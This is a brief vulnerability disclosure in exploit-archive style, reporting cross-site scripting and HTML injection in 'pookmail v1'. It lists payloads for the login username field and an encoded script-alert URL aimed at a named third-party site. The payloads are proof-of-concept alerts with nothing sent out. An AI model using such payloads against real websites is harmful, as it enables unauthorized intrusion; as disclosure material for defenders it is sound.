===============================================================
| # Title : pookmail v1 Xss Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor : http://up.top4top.net/downf-top4top_0d4ce23cca1-gz.html
==============================================================
in username login use payload :
( XSS / HTML Inject ) :
<marquee><font color=lime size=32>indoushka</font></marquee>
or :
<script>alert(1);</script>
http://www.sqaresources.net/mailbox.php?email=%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Ealert(/indoushka/)%3C/ScRiPt%3E
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================